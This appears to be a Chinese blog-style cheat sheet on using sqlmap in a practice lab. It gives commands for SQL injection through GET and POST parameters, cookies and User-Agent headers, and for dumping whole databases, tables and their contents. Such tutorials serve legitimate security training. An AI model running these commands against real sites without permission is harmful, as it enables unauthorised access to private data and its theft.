简介:
sqlmap是一款开源的自动化sql注入工具,主要用于检测和利用Web应用程序中的SQL注入漏洞。
使用方法(GET型):
sqlmap -u "url+注入点":因为sqlmap不能直接扫描网站漏洞,所以要手动加上注入点,再用sqlmap来利用
指定文件检测:
sqlmap -m <指定文件>
查询数据库:
sqlmap -u "url" --dbs
查询数据表:
sqlmap -u "url" --tables
查询指定数据库的表:
sqlmap -u "url" -D '数据库名' --tables
查询字段:
sqlmap -u "url" -D '数据库名' --columns
查询指定数据库中指定表的字段:
sqlmap -u "url" -D '数据库名' -T '表名' --columns
查询数据:
sqlmap -u "url" -D '数据库名' -T '表名' --dump
指定当前使用的数据库:
sqlmap -u "url" --current-db
POST型使用方法:
因为post请求不会将参数直接暴漏在url中,因此不能直接使用-u url命令的方法去使用,而是需要先利用抓包来完成
首先对靶场进行抓包,并保存到文档中,复制到kali
然后使用-r指定文件进行使用
sqlmap -r /home/kali/桌面/1.txt
查询数据库:
sqlmap -r /home/kali/桌面/1.txt --dbs
sqlmap -r /home/kali/桌面/1.txt --dbs
指定查询当前数据库:
sqlmap -r /home/kali/桌面/1.txt --current-db
爆表(也可以指定当前数据库):
sqlmap -r /home/kali/桌面/1.txt (-D '数据库名')--tables
爆字段(也可以指定数据库或表):
sqlmap -r /home/kali/桌面/1.txt (-D '数据库名')(-T '表名')--columns
爆内容(也可以指定数据库或表或字段):
sqlmap -r /home/kali/桌面/1.txt (-D '数据库名')(-T '表名')--dump
Cookie型注入使用方法:
sqlmap -u "url" --cookie='cookie'(--level(1-4)代表等级)
爆数据库:
sqlmap -u "url" --cookie='cookie' --dbs
指定数据库爆表:
sqlmap -u "url" --cookie='cookie' -D '数据库名' --tables
指定表爆字段:
sqlmap -u "url" --cookie='cookie' -D '数据库名' -T '表名' --columns
指定表爆数据:
sqlmap -u "url" --cookie='cookie' -D '数据库名' -T '表名' --dump
还可以使用抓包:
查看抓取的请求包
因为uname是注入点,所以这里需要将cookie中的uname标记成*
sqlmap -r 文件名 --current-db --dump
Header(User-Agent)型注入:
还是需要抓包
然后将User-Agent标记成*
查询数据库:
sqlmap -r "文件名" --dbs
指定数据库查询表:
sqlmap -r "文件名" -D '数据库名' --tables
指定表查询字段:
sqlmap -r "文件名" -D '数据库名' -T '表名' --columns
查内容:
sqlmap -r "文件名" -D '数据库名' -T '表名' --dump
也可以不使用抓包:
sqlmap -u "url" --data="uname=admin&passwd=admin&submit=Submit" --User-Agent="*" --batch --dbs
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
